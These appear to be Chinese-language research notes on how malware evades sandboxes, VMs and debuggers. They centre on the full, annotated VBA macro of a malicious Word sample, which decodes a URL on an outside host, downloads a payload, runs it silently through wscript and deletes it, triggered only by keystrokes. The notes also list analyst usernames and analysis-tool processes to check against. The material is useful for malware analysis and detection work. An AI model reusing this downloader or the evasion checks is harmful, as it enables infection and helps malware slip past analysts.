沙箱

特殊进程名,模块名,路径\文件名

特殊行为(本文主要记录)

硬件

通过利用正常宿主环境与沙箱环境之间的细节差异进行沙箱判定,以鉴别自身是否运行在沙箱等分析环境中;在硬件层面,则是利用虚拟机等环境与真实硬件之间的区别,只有在判定执行环境对样本而言是“安全”的(即非分析环境)之后才继续执行。

  • 检测到鼠标等外设的存在
  • 是否可以播放声音

    动作

    鼠标

  • 移动

  • 点击

    键盘

    窗口

    输入

    需要用户输入(甚至是特定的值)才会触发后续的执行逻辑。
    样本8DE75256D0E579416263CB3C61FC6C55
    宏代码
    ```python Declare PtrSafe Sub Sleep Lib \”kernel32.dll\” (ByVal Milliseconds As Integer) Declare PtrSafe Sub WinExec Lib \”kernel32.dll\” (ByVal cmd As String, ByVal opcode As Integer) Declare PtrSafe Function CreateFileA Lib \”kernel32.dll\” (ByVal FileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long Declare PtrSafe Function WriteFile Lib \”kernel32.dll\” (ByVal hFile As Long, ByVal lpBuffer As String, ByVal nNumberOfBytesToWrite As Long, ByVal lpNumberOfBytesWritten As LongPtr, ByVal lpOverlapped As Long) As Long Declare PtrSafe Function CloseHandle Lib \”kernel32.dll\” (ByVal hObject As Integer) As Long Declare PtrSafe Function DeleteFileA Lib \”kernel32.dll\” (ByVal lpFileName As String) As Long Declare PtrSafe Function CopyFileA Lib \”kernel32.dll\” (ByVal Src As String, ByVal Dest As String, ByVal opcode As Integer) As Long Declare PtrSafe Function SHGetSpecialFolderPathA Lib \”shell32.dll\” (ByVal hwndOwner As Long, ByVal lpszPath As String, ByVal nFolder As Long, ByVal fCreate As Long) As Long

' Execution (run-once) flag: AutoOpen resets it to 0 and ujmikl sets it to 1
' after its download/execute branch has run, so that branch fires at most once
' per document session.
Dim qazwsx As Integer

' Document-open entry point. It only arms the run-once flag; the payload
' routine ujmikl is NOT called from here but from the key-handler subs further
' down, so merely opening the document does not trigger the download.
Sub AutoOpen() On Error Resume Next qazwsx = 0 End Sub

' Thin wrapper around the Base64 decoder afghhha. The indirection adds no
' functionality; it only separates the decoder's name from its call sites.
Function sfjksfdgasdfhefgh(data) On Error Resume Next sfjksfdgasdfhefgh = afghhha(data) End Function

' Hand-rolled Base64 decoder (the macro avoids any library decoder).
' Input: a Base64 string; CR/LF, tabs and spaces are stripped first (lines 1-3).
' Output: the decoded bytes as a VBA string, or an empty string via Exit Function.
' Algorithm: for every 4-character group (line 5) each character is looked up in
' the alphabet with a case-sensitive (vbBinaryCompare) InStr; '=' padding reduces
' the number of output bytes for that group (lines 11-13). The 24-bit group value
' is formatted as 6 hex digits, zero-padded (lines 23-24), and split into three
' bytes (lines 25-27), of which only numDataBytes are appended (line 28).
' A character not in the alphabet raises Err 2 "Base64Decode" (line 18); because
' the callers run under On Error Resume Next that error is swallowed.
' Used twice in ujmikl: to recover the download URL from a literal and to decode
' the HTTP response body before it is written to disk.
Function afghhha(ByVal base64String) Const Base64 = \”ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\” Dim dataLength, sOut, groupBegin

  1. base64String = Replace(base64String, vbCrLf, \"\")
  2. base64String = Replace(base64String, vbTab, \"\")
  3. base64String = Replace(base64String, \" \", \"\")
  4. dataLength = Len(base64String)
  5. For groupBegin = 1 To dataLength Step 4
  6. Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
  7. numDataBytes = 3
  8. nGroup = 0
  9. For CharCounter = 0 To 3
  10. thisChar = Mid(base64String, groupBegin + CharCounter, 1)
  11. If thisChar = \"=\" Then
  12. numDataBytes = numDataBytes - 1
  13. thisData = 0
  14. Else
  15. thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
  16. End If
  17. If thisData = -1 Then
  18. Err.Raise 2, \"Base64Decode\", \"Bad character In Base64 string.\"
  19. Exit Function
  20. End If
  21. nGroup = 64 * nGroup + thisData
  22. Next
  23. nGroup = Hex(nGroup)
  24. nGroup = String(6 - Len(nGroup), \"0\") & nGroup
  25. pOut = Chr(CByte(\"&H\" & Mid(nGroup, 1, 2))) + _
  26. Chr(CByte(\"&H\" & Mid(nGroup, 3, 2))) + _
  27. Chr(CByte(\"&H\" & Mid(nGroup, 5, 2)))
  28. sOut = sOut & Left(pOut, numDataBytes)
  29. Next
  30. afghhha = sOut

End Function

' Writes `data` to the path `file`: deletes any existing file, then opens it with
' CreateFileA(dwDesiredAccess = 268435456 (0x10000000, GENERIC_ALL),
' dwShareMode = 1 (FILE_SHARE_READ), dwCreationDisposition = 4 (OPEN_ALWAYS)),
' writes Len(data) bytes and closes the handle. `ddd` = VarPtr(point) is the
' bytes-written out-pointer. The function has no return value and, because of
' On Error Resume Next, a failed write is never reported to the caller.
' CloseHandle is declared with an Integer handle parameter, so a handle value
' outside the 16-bit range raises an overflow that the same error suppression hides.
Function gjhmksfghsdfgs(file, data) On Error Resume Next DeleteFileA file Dim fs As Long fs = CreateFileA(file, 268435456, 1, 0, 4, 0, 0) If (fs <> -1) Then Dim point As Long ddd = VarPtr(point) WriteFile fs, data, Len(data), ddd, 0 CloseHandle fs End If End Function

' Resolves a well-known folder by CSIDL index: fills a MAX_PATH (260) buffer via
' SHGetSpecialFolderPathA and returns the text before the first NUL. ujmikl calls
' it with 26 (CSIDL_APPDATA) and 36 (CSIDL_WINDOWS). If the API call fails the
' buffer contains no NUL, InStr returns 0 and Left$(..., -1) errors; that error
' is swallowed by On Error Resume Next and the function returns an empty string.
Function ughjesrh56hdsf(nFolder As Long) As String On Error Resume Next Const MAX_PATH = 260 Dim strBuffer As String strBuffer = Space$(MAX_PATH) SHGetSpecialFolderPathA 0, strBuffer, nFolder, 0 ughjesrh56hdsf = Left$(strBuffer, InStr(strBuffer, vbNullChar) - 1) End Function

' Payload routine, reached from the key-handler subs below. Runs only while the
' run-once flag qazwsx is 0:
'   1. ini = <CSIDL 26, APPDATA>\OneDriver.exe  (the literal is split into fragments)
'   2. drl = download URL recovered from a Base64 literal via sfjksfdgasdfhefgh
'   3. synchronous GET with MSXML2.ServerXMLHTTP.6.0; on HTTP 200 the response body
'      is Base64-decoded and written to ini by gjhmksfghsdfgs
'   4. ini is run through wscript.exe //e:vbscript //b with WinExec show-command 0,
'      deleted after Sleep 2000, and qazwsx is set to 1
' Unused leftovers: the wscript.shell object `wob` and the declared strings fhjk,
' aksjdfhashdf and fgjtgksdfhw are never referenced.
' Behaviour a defender can key detection on: the Word process creating a
' ServerXMLHTTP object, wscript.exe started by the Office process with
' //e:vbscript //b, and a file written to %APPDATA% and deleted seconds later.
' The whole body runs under On Error Resume Next, so every failure is silent.
Function ujmikl() On Error Resume Next If (qazwsx = 0) Then On Error Resume Next Dim fhjk As String Dim aksjdfhashdf As String Dim fgjtgksdfhw As String

  1. ini = ughjesrh56hdsf(26) & \"\\OneD\" & \"river.exe\"
  2. Set wob = CreateObject(\"wscript.shell\")
  3. ' decoded form of the Base64 literal on the next line: http://1213rt.atwebpages.com/cohb/d.php?filename=corona
  4. drl = sfjksfdgasdfhefgh(\"aHR0cDovLzEyMTNydC5hdHdlYnBhZ2VzLmNvbS9jb2hiL2QucGhwP2ZpbGVuYW1lPWNvcm9uYQ==\")
  5. Set WinHttpReq = CreateObject(\"MSXML2.ServerXMLHTTP.6.0\")
  6. WinHttpReq.Open \"GET\", drl, False
  7. WinHttpReq.send
  8. If WinHttpReq.Status = 200 Then
  9. gjhmksfghsdfgs ini, sfjksfdgasdfhefgh(WinHttpReq.responseText)
  10. ' assembles <CSIDL 36, WINDOWS>\System32\wscript.exe //e:vbscript //b "<ini>" from split string fragments
  11. str10 = ughjesrh56hdsf(36) & \"\\Syst\" & \"em3\" & \"2\\ws\" & \"cript.exe\" & \" \" & \"//e:v\" & \"bs\" & \"cri\" & \"pt //b \" & \"\"\"\" & ini & \"\"\"\"
  12. ' run it (WinExec show-command 0)
  13. WinExec str10, 0
  14. Sleep 2000
  15. ' delete the dropped file after the 2-second wait
  16. DeleteFileA ini
  17. End If
  18. qazwsx = 1

End If End Function

' Keystroke handlers. Each sub re-types the character or editing action it is
' presumably bound to and then calls ujmikl, so the download/execute branch only
' runs after the user has actually typed in the document -- the "input required"
' sandbox-evasion behaviour described in the text above. How Word maps keys to
' these subs is not shown in this listing (presumably template key bindings).
' Four handlers do NOT call ujmikl: JHL ("["), LDK (empty text), SLD (the double
' quote) and GFN ("C"). The caret-movement, delete and paste handlers
' (G8I, GKJ, ISE, HLK, KJG, TWQ, GQU, JKG, LKD, vfdc, vfdds) do call it.
' The three-letter sub names carry no meaning.
Sub FLL() Selection.TypeText Text:=\”a\” ujmikl End Sub

Sub G9W() Selection.TypeText Text:=\”b\” ujmikl End Sub

Sub GEA() Selection.TypeText Text:=\”c\” ujmikl End Sub

Sub GJA() Selection.TypeText Text:=\”d\” ujmikl End Sub

Sub HFG() Selection.TypeText Text:=\”e\” ujmikl End Sub

Sub HMD() Selection.TypeText Text:=\”f\” ujmikl End Sub

Sub IWE() Selection.TypeText Text:=\”i\” ujmikl End Sub

Sub JFG() Selection.TypeText Text:=\”j\” ujmikl End Sub

Sub JGL() Selection.TypeText Text:=\”k\” ujmikl End Sub

Sub JGY() Selection.TypeText Text:=\”l\” ujmikl End Sub

Sub JNF() Selection.TypeText Text:=\”m\” ujmikl End Sub

Sub KFG() Selection.TypeText Text:=\”n\” ujmikl End Sub

Sub KGH() Selection.TypeText Text:=\”o\” ujmikl End Sub

Sub KJE() Selection.TypeText Text:=\”p\” ujmikl End Sub

Sub KSA() Selection.TypeText Text:=\”q\” ujmikl End Sub

Sub KYP() Selection.TypeText Text:=\”r\” ujmikl End Sub

Sub SLK() Selection.TypeText Text:=\”t\” ujmikl End Sub

Sub THS() Selection.TypeText Text:=\”u\” ujmikl End Sub

Sub W3I() Selection.TypeText Text:=\”v\” ujmikl End Sub

Sub WSE() Selection.TypeText Text:=\”w\” ujmikl End Sub

Sub ASN() Selection.TypeText Text:=\”y\” ujmikl End Sub

Sub DF8() Selection.TypeText Text:=\”z\” ujmikl End Sub

Sub IHI() Selection.TypeText Text:=\”h\” ujmikl End Sub

Sub AKS() Selection.TypeText Text:=\”x\” ujmikl End Sub

Sub HSL() Selection.TypeText Text:=\”g\” ujmikl End Sub

Sub ESH() Selection.TypeText Text:=\”1\” ujmikl End Sub

Sub F8G() Selection.TypeText Text:=\”2\” ujmikl End Sub

Sub FDG() Selection.TypeText Text:=\”3\” ujmikl End Sub

Sub FGH() Selection.TypeText Text:=\”4\” ujmikl End Sub

Sub FGJ() Selection.TypeText Text:=\”5\” ujmikl End Sub

Sub FGM() Selection.TypeText Text:=\”6\” ujmikl End Sub

Sub FGU() Selection.TypeText Text:=\”7\” ujmikl End Sub

Sub FJG() Selection.TypeText Text:=\”8\” ujmikl End Sub

Sub FKJ() Selection.TypeText Text:=\”9\” ujmikl End Sub

Sub ERH() Selection.TypeText Text:=\”0\” ujmikl End Sub

Sub JTO() Selection.TypeText Text:=\”-\” ujmikl End Sub

Sub KJP() Selection.TypeText Text:=\”=\” ujmikl End Sub

Sub G8I() Selection.TypeBackspace ujmikl End Sub

Sub JHL() Selection.TypeText Text:=\”[\” End Sub

Sub LDK() Selection.TypeText Text:=\”\” End Sub

Sub G9Y() Selection.TypeText Text:=\”B\” ujmikl End Sub

Sub GJL() Selection.TypeText Text:=\”D\” ujmikl End Sub

Sub HIT() Selection.TypeText Text:=\”E\” ujmikl End Sub

Sub HSJ() Selection.TypeText Text:=\”F\” ujmikl End Sub

Sub IER() Selection.TypeText Text:=\”G\” ujmikl End Sub

Sub IRJ() Selection.TypeText Text:=\”H\” ujmikl End Sub

Sub JFB() Selection.TypeText Text:=\”I\” ujmikl End Sub

Sub JGK() Selection.TypeText Text:=\”J\” ujmikl End Sub

Sub JGS() Selection.TypeText Text:=\”K\” ujmikl End Sub

Sub JLA() Selection.TypeText Text:=\”L\” ujmikl End Sub

Sub KDJ() Selection.TypeText Text:=\”M\” ujmikl End Sub

Sub KFJ() Selection.TypeText Text:=\”N\” ujmikl End Sub

Sub KRO() Selection.TypeText Text:=\”P\” ujmikl End Sub

Sub KUJ() Selection.TypeText Text:=\”Q\” ujmikl End Sub

Sub LKF() Selection.TypeText Text:=\”R\” ujmikl End Sub

Sub REI() Selection.TypeText Text:=\”S\” ujmikl End Sub

Sub TGS() Selection.TypeText Text:=\”T\” ujmikl End Sub

Sub UIG() Selection.TypeText Text:=\”U\” ujmikl End Sub

Sub WGY() Selection.TypeText Text:=\”V\” ujmikl End Sub

Sub YGA() Selection.TypeText Text:=\”W\” ujmikl End Sub

Sub ASJ() Selection.TypeText Text:=\”X\” ujmikl End Sub

Sub BKS() Selection.TypeText Text:=\”Y\” ujmikl End Sub

Sub DFJ() Selection.TypeText Text:=\”Z\” ujmikl End Sub

Sub FUE() Selection.TypeText Text:=\”A\” ujmikl End Sub

Sub KJD() Selection.TypeText Text:=\”O\” ujmikl End Sub

Sub QWE() Selection.TypeText Text:=\”\\” ujmikl End Sub

Sub KUY() Selection.TypeText Text:=\”;\” ujmikl End Sub

Sub SWR() Selection.TypeText Text:=\”‘\” ujmikl End Sub

Sub GIR() Selection.TypeText Text:=\”,\” ujmikl End Sub

Sub GLS() Selection.TypeText Text:=\”.\” ujmikl End Sub

Sub GAL() Selection.TypeText Text:=\”/\” ujmikl End Sub

Sub LSK() Selection.TypeText Text:=\”@\” ujmikl End Sub

Sub MLD() Selection.TypeText Text:=\”#\” ujmikl End Sub

Sub MNA() Selection.TypeText Text:=\”$\” ujmikl End Sub

Sub MND() Selection.TypeText Text:=\”%\” ujmikl End Sub

Sub NLD() Selection.TypeText Text:=\”^\” ujmikl End Sub

Sub OHW() Selection.TypeText Text:=\”&\” ujmikl End Sub

Sub OJE() Selection.TypeText Text:=\”*\” ujmikl End Sub

Sub OYJ() Selection.TypeText Text:=\”(\” ujmikl End Sub

Sub LKS0() Selection.TypeText Text:=\”)\” ujmikl End Sub

Sub RUI() Selection.TypeText Text:=\”_\” ujmikl End Sub

Sub RLK() Selection.TypeText Text:=\”+\” ujmikl End Sub

Sub RTJ() Selection.TypeText Text:=\”{\” ujmikl End Sub

Sub SFG() Selection.TypeText Text:=\”}\” ujmikl End Sub

Sub SKD() Selection.TypeText Text:=\”|\” ujmikl End Sub

Sub SDL() Selection.TypeText Text:=\”:\” ujmikl End Sub

Sub SLD() Selection.TypeText Text:=\”\”\”\” End Sub

Sub RGH() Selection.TypeText Text:=\”<\” ujmikl End Sub

Sub RJG() Selection.TypeText Text:=\”>\” ujmikl End Sub

Sub RFU() Selection.TypeText Text:=\”?\” ujmikl End Sub

Sub LKS() Selection.TypeText Text:=\”s\” ujmikl End Sub

Sub LQW() Selection.TypeText Text:=\”!\” ujmikl End Sub

Sub GFN() Selection.TypeText Text:=\”C\” End Sub

Sub GKJ() Selection.Delete Unit:=wdCharacter, Count:=1 ujmikl End Sub

Sub ISE() Selection.HomeKey Unit:=wdLine ujmikl End Sub

Sub HLK() Selection.EndKey Unit:=wdLine ujmikl End Sub

Sub KJG() Selection.MoveUp Unit:=wdScreen, Count:=1 ujmikl End Sub

Sub TWQ() Selection.MoveUp Unit:=wdLine, Count:=1 ujmikl End Sub

Sub GQU() Selection.MoveDown Unit:=wdLine, Count:=1 ujmikl End Sub

Sub JKG() Selection.MoveLeft Unit:=wdCharacter, Count:=1 ujmikl End Sub

Sub LKD() Selection.MoveRight Unit:=wdCharacter, Count:=1 ujmikl End Sub

Sub vfdc() Selection.Paste ujmikl End Sub

Sub vfdds() Selection.Paste ujmikl End Sub

  1. <a name="g2I3O"></a>
  2. ###### 函数/方法
  3. Selection.TypeText<br /> Selection.[按键/鼠标移动]
  4. <a name="DFQvd"></a>
  5. # 虚拟机
  6. <a name="LmEYY"></a>
  7. ## 真实硬件状态
  8. 例如硬盘大小、内存大小、CPU风扇、型号、BIOS序列号/名称、电源电压、温度等等
  9. <a name="aSPue"></a>
  10. ## 虚拟机环境
  11. 用户名、主机名等:

15pb、7man2、stella、f4kh9od、willcarter、biluta、ehwalker、hong lee、joe cage、jonathan、kindsight、malware、peter miller、petermiller、phil、rapit、r0b0t、cuckoo、vm-pc、analyze、roslyn、vince、test、sample、mcafee、vmscan、mallab、abby、elvis、wilbert、joe smith、hanspeter、johnson、placehole、tequila、paggy sue、klone、oliver、stevens、ieuser、virlab、beginer、beginner、markos、semims、gregory、tom-pc、will carter、angelica、eric johns、john ca、lebron james、rats-pc、robot、serena、sofynia、straz、bea-ch

  1. <a name="sY0Ew"></a>
  2. ### 🤣🤣🤣15PB🤣🤣🤣
  3. 甚至出现了我国知名二进制逆向培训公司“[15PB](http://www.15pb.com.cn)”:<br />![image.png](https://cdn.nlark.com/yuque/0/2021/png/1632223/1621585437526-15daf219-f188-4e16-9d9f-4123e6f48c2e.png#clientId=ubefe1b63-2c84-4&from=paste&height=162&id=ORIcb&originHeight=162&originWidth=1384&originalType=binary&ratio=1&rotation=0&showTitle=false&size=157109&status=done&style=none&taskId=u8feed876-e969-4450-a57c-b6b02786291&title=&width=1384)
  4. <a name="rWc5b"></a>
  5. ### Virtual Box
  6. <a name="a8nQn"></a>
  7. #### 检测文件
  8. VBoxMouse.sys等
  9. <a name="qBYXG"></a>
  10. #### 注册表
  11. VirtualBox Guest Additions directory等
  12. <a name="j3vtd"></a>
  13. #### 进程
  14. VBoxControl.exe等
  15. <a name="foh3y"></a>
  16. #### 服务
  17. VBoxService等
  18. <a name="icp6s"></a>
  19. #### 硬件
  20. MAC地址等
  21. <a name="WggIA"></a>
  22. # 调试
  23. <a name="eJ5ke"></a>
  24. ## 调试器
  25. - 基本的例如 IsDebuggerPresent API、PEB.BeingDebugged 等
  26. - TLS 回调
  27. - hard/software breakpoints
  28. - VirtualAlloc
  29. <a name="B6UfH"></a>
  30. ## 分析工具
  31. 分析工具进程检测,主要是一些和虚拟环境、逆向、病毒分析、二进制、编程有关的软件:

python、vmacthlp、VGAuthService、vmtoolsd、TPAutoConnSvc、ftnlsv、ftscanmgrhv、vmwsprrdpwks、usbarbitrator、horizon_client_service、ProcessHacker、procexp、Autoruns、pestudio、Wireshark、dumpcap、TSVNCache、dnSpy、ConEmu、010Editor、ida64、Procmon、ollydbg、LordPE、Fiddler、CFF Explorer、sample、vboxservice、vboxtray ```